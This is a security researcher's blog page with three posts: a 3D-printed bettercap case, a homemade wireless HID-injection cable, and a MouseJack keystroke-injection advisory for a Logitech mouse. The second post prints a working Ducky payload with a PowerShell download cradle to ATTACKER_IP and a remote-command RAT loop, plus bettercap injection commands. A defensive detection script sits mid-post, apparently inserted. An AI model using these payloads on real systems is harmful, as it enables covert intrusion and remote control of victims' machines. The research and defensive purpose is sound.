David Sopas – Web Security Researcher

bettercap

27/08/20 Hardware, Tools

I printed a 3D box for my bettercap arsenal and I liked it


Looking at the title you might think that it’s Katy Perry’s new hit… It isn’t… I’m sorry…

One of my favourite tools when doing security assessments is bettercap. It’s like “one tool to rule them all”. With that in mind, I needed something to carry my bettercap arsenal when going to a client. Using my self-taught 3D skills (btw n00b level) I decided to design my own box.

I needed something to pack the following:

With the first version I encountered some issues. It was too big; the Alfa card was a bit tight; the lid didn’t close correctly and it was not very appealing.

So I started working on my second version, which I would reduce a bit by putting the slot for the two antennas (Alfa card and the CrazyRadio) and modifying the BLE dongle slot to also reduce some space. I added 4 pinouts to better close the lid.

I was getting close to what I needed; nevertheless I wanted more, especially because I had a hard time taking the antennas and the BLE dongle. Also, the pinouts were not a good option to accommodate the lid. So I decided to add a few things:

  • Small cuts to improve the removal of the antennas and the BLE dongle
  • New slot to put whatever I needed – you never know…
  • New lid that just slides into the box

And what about the lid? Besides helping to open – creating some friction – it’s leet 🙂

If you are interested in printing it, I uploaded it to Thingiverse and feel free to ping me on Twitter for suggestions or modifications.

Have fun!

27/12/19 Hardware, Tips and Tricks

Gone in 30 seconds – a HID cable story tale


Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Soldered (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Added a nice plastic USB enclosure to make it more real:

The whole process was fast; it took me around 5 minutes to cut, solder and super-glue it all together. In the end I think it could be better, especially when I rammed the USB connector with a knife.

The second part took a little longer because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of the bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using hid.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC it is just a reverse shell to my VPS

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750

function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}
 
function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}
 
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);
 
    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}

  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependent)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap

bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And it’s basically game over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.
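On the defensive side, the command line typed by the Ducky payload above is visible in process-creation logging. The following Python is an added example, not code from the original post: it goes a little beyond the exact string in the post by resolving PowerShell's abbreviated switches, and the record fields (`Image`, `CommandLine`), the function names and the sample records are assumptions constructed for illustration.

```python
import re

# Shortest abbreviation accepted per powershell.exe switch (PowerShell resolves
# abbreviated parameter names, so "-W", "-Win" and "-WindowStyle" are equivalent).
PARAMS = {"noprofile": "nop", "noninteractive": "noni",
          "executionpolicy": "ex", "windowstyle": "w"}
CRADLE = re.compile(r"\b(iex|invoke-expression)\b.*\bdownloadstring\s*\(", re.I | re.S)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def canonical(token):
    """Map '-NoP', '-Exec', '-W', ... to the full parameter name, else None."""
    name = token.lstrip("-").lower()
    if name == "ep":  # alias of -ExecutionPolicy
        return "executionpolicy"
    for full, shortest in PARAMS.items():
        if full.startswith(name) and name.startswith(shortest):
            return full
    return None

def analyze(event):
    """Return (reasons, urls) for one process-creation record (Sysmon ID 1 style)."""
    if not event["Image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return [], []
    cmd = event["CommandLine"]
    tokens = cmd.split() + [""]  # sentinel so a trailing switch has a "value"
    switches = {canonical(t): tokens[i + 1].strip("\"'").lower()
                for i, t in enumerate(tokens[:-1]) if t.startswith("-") and canonical(t)}
    reasons = []
    if switches.get("executionpolicy") == "bypass":
        reasons.append("execution policy bypass")
    if switches.get("windowstyle") == "hidden":
        reasons.append("hidden window")
    if CRADLE.search(cmd):
        reasons.append("download-and-execute in memory")
    return reasons, URL.findall(cmd)

def triage(events, threshold=2):
    """Keep events with at least `threshold` independent indicators."""
    return [(e["CommandLine"], *analyze(e)) for e in events if len(analyze(e)[0]) >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records; the first command line is the one typed by the Ducky payload.
SAMPLE_EVENTS = [
    {"Image": PS, "CommandLine":
     "powershell -NoP -NonI -Exec Bypass -W hidden \"IEX (New-Object System.Net.WebClient)"
     ".DownloadString('http://ATTACKER_IP/ps.txt')\""},
    {"Image": PS, "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\calc.exe", "CommandLine": "calc"},
]
```

`triage(SAMPLE_EVENTS)` returns only the first record, with its reasons and the URL to hand to network monitoring; the scheduled-script and calc records stay below the threshold.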

In the process of creating this HID cable with “leftovers” I learned a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (especially when ripped from others) when you can make your own for less than $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid to fail at first. Be persistent and never quit.
18/03/19 Advisories, Hardware

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seeing the new update on Bettercap – which supports HID (Human Interface Device) – I decided to read about it – especially on MouseJack keystroke injection attacks.

I went through the affected devices list and didn’t have any on my own to test it. BUT I had a Logitech M185 wireless mouse which is very popular because… it’s cheap compared to other models.

I grabbed the CrazyRadio dongle – which was waiting for better usage on my lab – and put it into action.

I opened Bettercap and turned on the HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple hid.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere 🙂

Next, I created a simple DuckyScript to show the Windows calculator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

  • Bettercap running with HID module on
  • Detected my Logitech M185 2.4GHz mouse
  • Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens:

hid.inject ADDR PT ducky.txt

You can see the end result in this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeh it’s vulnerable 🙂
